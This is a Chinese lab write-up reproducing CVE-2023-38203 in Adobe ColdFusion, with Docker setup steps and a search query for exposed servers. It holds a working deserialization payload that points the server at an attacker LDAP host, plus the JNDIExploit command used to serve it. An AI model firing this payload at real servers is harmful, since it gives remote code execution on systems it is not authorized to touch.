一:漏洞描述
Adobe ColdFusion是一款由Adobe Systems开发的服务器端脚本语言和Web应用程序开发平台。它是一种快速开发、强大且易于学习的技术,旨在简化复杂的企业级应用程序开发。该产品存在反序列化漏洞。
二:漏洞影响版本
2018u17(及早期版本) <
Adobe
ColdFusion < 2021u7(及早期版本)
2021u7(及早期版本) < Adobe ColdFusion < 2023u1(及早期版本)
三:网络空间测绘查询
app=
"Adobe-ColdFusion"
四:靶场搭建
拉取镜像
docker pull vulfocus/vcpe-1.0
-a
-adobe-coldfusion:2023.0.0.330468-openjdk-release
启动容器
docker run -d -P vulfocus/vcpe-1.0
-a
-adobe-coldfusion:2023.0.0.330468-openjdk-release
查看容器
docker
ps
五:漏洞复现
POC:
POST
/CFIDE/adminapi/base.cfc?method=
HTTP/1.1
Host
:
Content-Type
: application/x-www-form-urlencoded
Content-Length
: 290
cmd
: ls
argumentCollection=
<
wddxPacket+version%3d'1.0'
>
<
header
/>
<
data
>
<
struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'
>
<
var+name%3d'dataSourceName'
>
<
string
>
ldap://192.168.31.59:1389/Basic/TomcatEcho
</
string
>
</
var
>
<
var+name%3d'autoCommit'
>
<
boolean+value%3d'true'
/>
</
var
>
</
struct
>
</
data
>
</
wddxPacket
>
JNDIExploit-1.4-SNAPSHOT.jar 是一个Java工具,用于测试和利用Java命名和目录界面(Java Naming and Directory Interface,JNDI)服务的漏洞。JNDI是Java平台中用于访问各种命名和目录服务的API,通常用于在Java应用程序中查找和访问远程对象。(工具获取在底文)
命令中的192.168.111.131是我本机IP
java
-jar
JNDIExploit-1
.4-SNAPSHOT
.jar
-i
192
.168
.111
.131
六:批量检测
原文始发于微信公众号(Adler学安全):漏洞复现-CVE-2023-38203
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论